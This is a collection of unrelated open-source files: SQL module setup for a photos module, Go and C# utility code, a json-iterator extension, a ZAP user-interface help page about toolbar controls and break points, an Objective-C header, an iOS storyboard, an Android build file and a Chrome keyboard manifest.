'_bx_photos', @iSearchOrder + 1, 'BxPhotosSearchResult', 'modules/boonex/photos/classes/BxPhotosSearchResult.php'), ('bx_photos_cmts', '_bx_photos_cmts', @iSearchOrder + 2, 'BxPhotosCmtsSearchResult', 'modules/boonex/photos/classes/BxPhotosCmtsSearchResult.php'); -- METATAGS INSERT INTO `sys_objects_metatags` (`object`, `table_keywords`, `table_locations`, `table_mentions`, `override_class_name`, `override_class_file`) VALUES ('bx_photos', 'bx_photos_meta_keywords', 'bx_photos_meta_locations', 'bx_photos_meta_mentions', '', ''); -- CATEGORY INSERT INTO `sys_objects_category` (`object`, `search_object`, `form_object`, `list_name`, `table`, `field`, `join`, `where`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_cats', 'bx_photos', 'bx_photos', 'bx_photos_cats', 'bx_photos_entries', 'cat', 'INNER JOIN `sys_profiles` ON (`sys_profiles`.`id` = `bx_photos_entries`.`author`)', 'AND `sys_profiles`.`status` = ''active''', '', ''); -- STATS SET @iMaxOrderStats = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_statistics`); INSERT INTO `sys_statistics` (`module`, `name`, `title`, `link`, `icon`, `query`, `order`) VALUES ('bx_photos', 'bx_photos', '_bx_photos', 'page.php?i=photos-home', 'camera-retro col-blue1', 'SELECT COUNT(*) FROM `bx_photos_entries` WHERE 1 AND `status` = ''active'' AND `status_admin` = ''active''', @iMaxOrderStats + 1); -- CHARTS SET @iMaxOrderCharts = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_objects_chart`); INSERT INTO `sys_objects_chart` (`object`, `title`, `table`, `field_date_ts`, `field_date_dt`, `field_status`, `query`, `active`, `order`, `class_name`, `class_file`) VALUES 
('bx_photos_growth', '_bx_photos_chart_growth', 'bx_photos_entries', 'added', '', 'status,status_admin', '', 1, @iMaxOrderCharts + 1, 'BxDolChartGrowth', ''), ('bx_photos_growth_speed', '_bx_photos_chart_growth_speed', 'bx_photos_entries', 'added', '', 'status,status_admin', '', 1, @iMaxOrderCharts + 2, 'BxDolChartGrowthSpeed', ''); -- GRIDS: moderation tools INSERT INTO `sys_objects_grid` (`object`, `source_type`, `source`, `table`, `field_id`, `field_order`, `field_active`, `paginate_url`, `paginate_per_page`, `paginate_simple`, `paginate_get_start`, `paginate_get_per_page`, `filter_fields`, `filter_fields_translatable`, `filter_mode`, `sorting_fields`, `sorting_fields_translatable`, `visible_for_levels`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_administration', 'Sql', 'SELECT * FROM `bx_photos_entries` WHERE 1 ', 'bx_photos_entries', 'id', 'added', 'status_admin', '', 20, NULL, 'start', '', 'title,text', '', 'like', 'reports', '', 192, 'BxPhotosGridAdministration', 'modules/boonex/photos/classes/BxPhotosGridAdministration.php'), ('bx_photos_common', 'Sql', 'SELECT * FROM `bx_photos_entries` WHERE 1 ', 'bx_photos_entries', 'id', 'added', 'status', '', 20, NULL, 'start', '', 'title,text', '', 'like', '', '', 2147483647, 'BxPhotosGridCommon', 'modules/boonex/photos/classes/BxPhotosGridCommon.php'); INSERT INTO `sys_grid_fields` (`object`, `name`, `title`, `width`, `translatable`, `chars_limit`, `params`, `order`) VALUES ('bx_photos_administration', 'checkbox', '_sys_select', '2%', 0, '', '', 1), ('bx_photos_administration', 'switcher', '_bx_photos_grid_column_title_adm_active', '8%', 0, '', '', 2), ('bx_photos_administration', 'reports', '_sys_txt_reports_title', '5%', 0, '', '', 3), ('bx_photos_administration', 'title', '_bx_photos_grid_column_title_adm_title', '25%', 0, '25', '', 4), ('bx_photos_administration', 'added', '_bx_photos_grid_column_title_adm_added', '20%', 1, '25', '', 5), ('bx_photos_administration', 'author', '_bx_photos_grid_column_title_adm_author', '20%', 0, '25', '', 6), ('bx_photos_administration', 'actions', '', '20%', 0, '', '', 7), ('bx_photos_common', 'checkbox', '_sys_select', '2%', 0, '', '', 1), ('bx_photos_common', 'switcher', '_bx_photos_grid_column_title_adm_active', '8%', 0, '', '', 2), ('bx_photos_common', 'title', '_bx_photos_grid_column_title_adm_title', '40%', 0, '35', '', 3), ('bx_photos_common', 'added', '_bx_photos_grid_column_title_adm_added', '30%', 1, '25', '', 4), ('bx_photos_common', 'actions', '', '20%', 0, '', '', 5); INSERT INTO `sys_grid_actions` (`object`, `type`, `name`, `title`, `icon`, `icon_only`, `confirm`, `order`) VALUES ('bx_photos_administration', 'bulk', 'delete', '_bx_photos_grid_action_title_adm_delete', '', 0, 1, 1), ('bx_photos_administration', 'single', 'edit', '_bx_photos_grid_action_title_adm_edit', 'pencil-alt', 1, 0, 1), ('bx_photos_administration', 'single', 'delete', '_bx_photos_grid_action_title_adm_delete', 'remove', 1, 1, 2), ('bx_photos_administration', 'single', 'settings', '_bx_photos_grid_action_title_adm_more_actions', 'cog', 1, 0, 3), ('bx_photos_common', 'bulk', 'delete', '_bx_photos_grid_action_title_adm_delete', '', 0, 1, 1), ('bx_photos_common', 'single', 'edit', '_bx_photos_grid_action_title_adm_edit', 'pencil-alt', 1, 0, 1), ('bx_photos_common', 'single', 'delete', '_bx_photos_grid_action_title_adm_delete', 'remove', 1, 1, 2), ('bx_photos_common', 'single', 'settings', '_bx_photos_grid_action_title_adm_more_actions', 'cog', 1, 0, 3); -- UPLOADERS INSERT INTO `sys_objects_uploader` 
(`object`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_simple', 1, 'BxPhotosUploaderSimple', 'modules/boonex/photos/classes/BxPhotosUploaderSimple.php'), ('bx_photos_html5', 1, 'BxPhotosUploaderHTML5', 'modules/boonex/photos/classes/BxPhotosUploaderHTML5.php'); -- ALERTS INSERT INTO `sys_alerts_handlers` (`name`, `class`, `file`, `service_call`) VALUES ('bx_photos', 'BxPhotosAlertsResponse', 'modules/boonex/photos/classes/BxPhotosAlertsResponse.php', ''); SET @iHandler := LAST_INSERT_ID(); INSERT INTO `sys_alerts` (`unit`, `action`, `handler_id`) VALUES ('system', 'save_setting', @iHandler), ('profile', 'delete', @iHandler);
{ "pile_set_name": "Github" }
package utils

import (
	"encoding/json"
	"fmt"
	"io/ioutil"
	"os"
	"path"
)

const (
	assetFileName = "asset-manifest.json"
)

// ResourceMapper maps an asset path to a static resource built by React
type ResourceMapper struct {
	assetMap map[string]string
}

// NewResourceMapper creates a new resource mapper
func NewResourceMapper(buildPath string) (mapper ResourceMapper) {
	filePath := path.Join(buildPath, assetFileName)
	jsonFile, err := os.Open(filePath)
	if err != nil {
		// keep quiet for now
		fmt.Printf("failed to read asset-manifest for resource mapper from %s\n", filePath)
		return
	}
	// close the manifest once it has been read, regardless of how we return
	defer jsonFile.Close()

	byteValue, err := ioutil.ReadAll(jsonFile)
	if err != nil {
		// keep quiet for now
		return
	}

	var assetMap map[string]string
	err = json.Unmarshal(byteValue, &assetMap)
	if err != nil {
		// keep quiet for now
		return
	}

	return ResourceMapper{
		assetMap: assetMap,
	}
}

// Map returns the physical path of a resource
func (m ResourceMapper) Map(assetName string) (string, error) {
	if v, ok := m.assetMap[assetName]; ok {
		return v, nil
	}

	return "", fmt.Errorf("failed to get resource path for %s", assetName)
}
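A usage sketch for the mapper above, written as a Go example function that could sit beside it in the same utils package (e.g. in a _test.go file); the "./build" directory and the "main.js" asset name are illustrative assumptions, not taken from the original file.

package utils

import "fmt"

// ExampleResourceMapper_Map sketches how a caller resolves a logical asset name
// to the hashed file produced by the React build. It assumes ./build/asset-manifest.json
// exists; when the manifest cannot be read, the mapper is empty and Map returns an error.
func ExampleResourceMapper_Map() {
	mapper := NewResourceMapper("./build")

	resolved, err := mapper.Map("main.js")
	if err != nil {
		fmt.Println("lookup failed:", err)
		return
	}
	fmt.Println("serving", resolved)
}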
{ "pile_set_name": "Github" }
/** * (C) Copyright IBM Corp. 2018, 2019. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ using Newtonsoft.Json; namespace IBM.Watson.CompareComply.v1.Model { /// <summary> /// The table's section title, if identified. /// </summary> public class SectionTitle { /// <summary> /// The text of the section title, if identified. /// </summary> [JsonProperty("text", NullValueHandling = NullValueHandling.Ignore)] public string Text { get; set; } /// <summary> /// The numeric location of the identified element in the document, represented with two integers labeled /// `begin` and `end`. /// </summary> [JsonProperty("location", NullValueHandling = NullValueHandling.Ignore)] public Location Location { get; set; } } }
{ "pile_set_name": "Github" }
package extra

import (
	"github.com/json-iterator/go"
	"unicode"
)

// SupportPrivateFields includes private fields when encoding/decoding
func SupportPrivateFields() {
	jsoniter.RegisterExtension(&privateFieldsExtension{})
}

type privateFieldsExtension struct {
	jsoniter.DummyExtension
}

func (extension *privateFieldsExtension) UpdateStructDescriptor(structDescriptor *jsoniter.StructDescriptor) {
	for _, binding := range structDescriptor.Fields {
		isPrivate := unicode.IsLower(rune(binding.Field.Name[0]))
		if isPrivate {
			binding.FromNames = []string{binding.Field.Name}
			binding.ToNames = []string{binding.Field.Name}
		}
	}
}
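A minimal sketch of how the extension above is typically wired up, assuming the standard json-iterator import paths; the config struct and its sample JSON document are invented for illustration.

package main

import (
	"fmt"

	jsoniter "github.com/json-iterator/go"
	"github.com/json-iterator/go/extra"
)

// config deliberately uses lowercase (private) fields, which encoding/json
// and a stock jsoniter config would both skip.
type config struct {
	host string
	port int
}

func main() {
	// Register the extension once, before any encode/decode calls.
	extra.SupportPrivateFields()

	var c config
	// With the extension active, private fields are matched by their exact field names.
	if err := jsoniter.UnmarshalFromString(`{"host":"localhost","port":8080}`, &c); err != nil {
		fmt.Println("decode failed:", err)
		return
	}
	fmt.Println(c.host, c.port) // localhost 8080
}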
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title> Top Level Toolbar </title> </head> <body bgcolor="#ffffff"> <h1>Top Level Toolbar</h1> <p> This toolbar provides a set of controls for commonly used functionality. <h2>Mode pulldown</h2> This allows you to change the current <a href="../start/concepts/modes.html">mode</a>. <h2><img src="../images/16/171.png" align="bottom" width="16" height="16" />&nbsp; New Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'New Session' menu item. <h2><img src="../images/16/047.png" align="bottom" width="16" height="16" />&nbsp; Open Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Open Session' menu item. <h2><img src="../images/16/096.png" align="bottom" width="16" height="16" />&nbsp; Persist Session...</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Persist Session...' menu item. <h2><img src="../images/fugue/camera.png" align="bottom" width="16" height="16" />&nbsp; Snapshot Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Snapshot Session' menu item. <h2><img src="../images/16/024.png" align="bottom" width="16" height="16" />&nbsp; Session Properties...</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Properties...' menu item. <h2><img src="../images/16/041.png" align="bottom" width="16" height="16" />&nbsp; Options...</h2> This button is the same as the <a href="tlmenu/tools.html">Tools menu</a> 'Options...' menu item. <h2><img src="../images/fugue/ui-tab-show.png" align="bottom" width="16" height="16" />&nbsp; Show all tabs</h2> This button reveals all of the hidden tabs. <h2><img src="../images/fugue/ui-tab-hide.png" align="bottom" width="16" height="16" />&nbsp; Hide unpinned tabs</h2> This button hides all of the tabs that are 'unpinned'. Tabs can be pinned and unpinned via the small 'pin' icon that is shown when the tab is selected. <h2><img src="../images/ui_tab_text.png" align="bottom" width="16" height="16" />&nbsp; Show tab names and icons</h2> This button toggles the displaying of the tab names. <h2><img src="../images/expand_sites.png" align="bottom" width="16" height="16" />&nbsp; Expand Sites Tab</h2> This changes the display so that the 'tree' window containing the Sites tab extends for the full length of the left hand side.<br> This will reduce the amount of space available to the 'information' window. <h2><img src="../images/expand_info.png" align="bottom" width="16" height="16" />&nbsp; Expand Information Tabs</h2> This changes the display so that the 'information' window extends for the full length of the bottom.<br> This will reduce the amount of space available to the 'tree' window. <h2><img src="../images/expand_full.png" align="bottom" width="16" height="16" />&nbsp; Full Layout</h2> This changes the display so that the selected tab takes up the full screen.<br> This is useful when using ZAP on small screens. <h2><img src="../images/layout_tabbed.png" align="bottom" width="16" height="16" />&nbsp; Request and Response tabs side by side</h2> This changes the display so that the request and response tabs are side by side.<br> This increases the information that can be displayed but means you cannot see both the request and response at the same time. 
<h2><img src="../images/layout_vertical_split.png" align="bottom" width="16" height="16" />&nbsp; Request shown above Response</h2>
This changes the display so that the request panel is shown above the response panel.<br>
This decreases the information that can be displayed but means you can see both the request and response at the same time.
<h2><img src="../images/layout_horizontal_split.png" align="bottom" width="16" height="16" />&nbsp; Request and Response panels side by side</h2>
This changes the display so that the request panel is shown to the left of the response panel.<br>
This decreases the information that can be displayed but means you can see both the request and response at the same time.
<h2><img src="../images/16/152.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp;
<img src="../images/16/151.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all requests and responses</h2>
This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next request or response in the <a href="tabs/break.html">Break tab</a>.<br/>
You can then change any part of the request or response that you want to and send it to the target application by pressing either of the 'Step' or 'Continue' buttons.<br/>
Alternatively you can press the 'Drop' button to dispose of the request or response.<br/>
You can switch between a single 'combined' break button and separate ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a>
<h2><img src="../images/16/105.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp;
<img src="../images/16/105r.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all requests</h2>
This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next request in the <a href="tabs/break.html">Break tab</a>.<br/>
You can then change any part of the request that you want to and send it to the target application by pressing either of the 'Step' or 'Continue' buttons.<br/>
Alternatively you can press the 'Drop' button to dispose of the request.<br/>
You can switch between a single 'combined' break button and separate ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a>
<h2><img src="../images/16/106.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp;
<img src="../images/16/106r.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all responses</h2>
This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next response in the <a href="tabs/break.html">Break tab</a>.<br/>
You can then change any part of the response that you want to and send it to your browser by pressing either of the 'Step' or 'Continue' buttons.<br/>
Alternatively you can press the 'Drop' button to dispose of the response.<br/>
You can switch between a single 'combined' break button and separate ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a>
<h2><img src="../images/16/143.png" align="bottom" width="16" height="16" />&nbsp; Step</h2>
This allows the trapped request or response to continue to the application or your browser with any changes that you have made to it.<br/>
The 'global' <a href="../start/concepts/breakpoints.html">break point</a> will remain set so that the
next request or response will also be caught.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/131.png" align="bottom" width="16" height="16" />&nbsp; Continue</h2> The 'global' <a href="../start/concepts/breakpoints.html">break point</a> will be unset so that subsequent requests and responses will no longer be caught by ZAP unless you have set break points on specific URLs.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/150.png" align="bottom" width="16" height="16" />&nbsp; Drop</h2> This drops the trapped request or response so that it is not passed on to the application or your browser.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/break_add.png" align="bottom" width="16" height="16" />&nbsp; Add a custom HTTP break point</h2> This displays the <a href="dialogs/addbreak.html">Add break point</a> dialog which allows you to specify the criteria for a <a href="../start/concepts/breakpoints.html">break point</a>. <h2><img src="../images/fugue/equalizer.png" align="bottom" width="16" height="16" />&nbsp; Scan Policy Manager...</h2> Shows the <a href="dialogs/scanpolicymgr.html">Scan Policy Manager</a> dialog which allows configuration of <a href="../start/concepts/scanpolicy.html">scan policies</a>. <h2><img src="../images/fugue/block.png" align="bottom" width="16" height="16" />&nbsp; Manage Add-ons</h2> This shows the <a href="dialogs/manageaddons.html">Manage Add-ons</a> dialog which allows you to discover, install and update add-ons from the online marketplace.<br/> It also allows you to uninstall add-ons. <h2><img src="../images/fugue/forcedUserOff.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp; <img src="../images/fugue/forcedUserOn.png" align="bottom" width="16" height="16" />&nbsp; Forced User Mode On / Off</h2> This switches forced user mode on and off.<br/> The button is only enabled when you have defined a forced user for at least one <a href="../start/concepts/contexts.html">context</a>, which can be done via the <a href="dialogs/session/contexts.html">Session Contexts</a> dialog. <p> Note that <a href="../start/concepts/addons.html">add-ons</a> can add additional buttons. </p> <h2>See also</h2> &nbsp;&nbsp;&nbsp;&nbsp;<a href="overview.html">The user interface overview</a><br/> <table> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="../start/start.html">Getting Started</a></td><td>for details of how to start using ZAP</td></tr> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="dialogs/dialogs.html">Dialogs</a></td><td>for details of the dialogs or popups </td></tr> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="../intro.html">Introduction</a></td><td>the introduction to ZAP</td></tr> </table> </body> </html>
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard. // #import "NSObject-Protocol.h" @protocol NSDraggingInfo; @protocol NSDraggingDestination <NSObject> @optional - (void)updateDraggingItemsForDrag:(id <NSDraggingInfo>)arg1; - (BOOL)wantsPeriodicDraggingUpdates; - (void)draggingEnded:(id <NSDraggingInfo>)arg1; - (void)concludeDragOperation:(id <NSDraggingInfo>)arg1; - (BOOL)performDragOperation:(id <NSDraggingInfo>)arg1; - (BOOL)prepareForDragOperation:(id <NSDraggingInfo>)arg1; - (void)draggingExited:(id <NSDraggingInfo>)arg1; - (unsigned long long)draggingUpdated:(id <NSDraggingInfo>)arg1; - (unsigned long long)draggingEntered:(id <NSDraggingInfo>)arg1; @end
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="8150" systemVersion="15A204g" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" initialViewController="01J-lp-oVM"> <dependencies> <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="8122"/> </dependencies> <scenes> <!--View Controller--> <scene sceneID="EHf-IW-A2E"> <objects> <viewController id="01J-lp-oVM" sceneMemberID="viewController"> <layoutGuides> <viewControllerLayoutGuide type="top" id="Llm-lL-Icb"/> <viewControllerLayoutGuide type="bottom" id="xb3-aO-Qok"/> </layoutGuides> <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3"> <rect key="frame" x="0.0" y="0.0" width="600" height="600"/> <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/> <animations/> <color key="backgroundColor" white="1" alpha="1" colorSpace="custom" customColorSpace="calibratedWhite"/> </view> </viewController> <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/> </objects> <point key="canvasLocation" x="53" y="375"/> </scene> </scenes> </document>
{ "pile_set_name": "Github" }
LOCAL_PATH := $(call my-dir) include $(CLEAR_VARS) LOCAL_MODULE := spine_static LOCAL_MODULE_FILENAME := libspine LOCAL_SRC_FILES := Animation.cpp \ AnimationState.cpp \ AnimationStateData.cpp \ Atlas.cpp \ AtlasAttachmentLoader.cpp \ Attachment.cpp \ AttachmentLoader.cpp \ Bone.cpp \ BoneData.cpp \ CCSkeleton.cpp \ CCSkeletonAnimation.cpp \ Json.cpp \ RegionAttachment.cpp \ Skeleton.cpp \ SkeletonData.cpp \ SkeletonJson.cpp \ Skin.cpp \ Slot.cpp \ SlotData.cpp \ BoundingBoxAttachment.cpp \ Event.cpp \ EventData.cpp \ SkeletonBounds.cpp \ extension.cpp \ spine-cocos2dx.cpp LOCAL_EXPORT_C_INCLUDES := $(LOCAL_PATH)/.. LOCAL_C_INCLUDES := $(LOCAL_PATH)/../.. \ $(LOCAL_PATH)/.. LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static include $(BUILD_STATIC_LIBRARY) $(call import-module,.)
{ "pile_set_name": "Github" }
/* Copyright 2014 Google Inc. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ { "name": "Russian Phonetic Dvorak", "version": "1.0", "manifest_version": 2, "description": "Russian Phonetic Dvorak keyboard", "permissions": [ "input" ], "input_components": [ { "name": "Russian Phonetic Dvorak", "type": "ime", "id": "ru_phonetic_dvorak_xkb", "description": "Russian Phonetic Dvorak keyboard", // user visible description "language": "ru", // The primary language this IME is used for "layouts": ["pl(ru_phonetic_dvorak)"] } ] }
{ "pile_set_name": "Github" }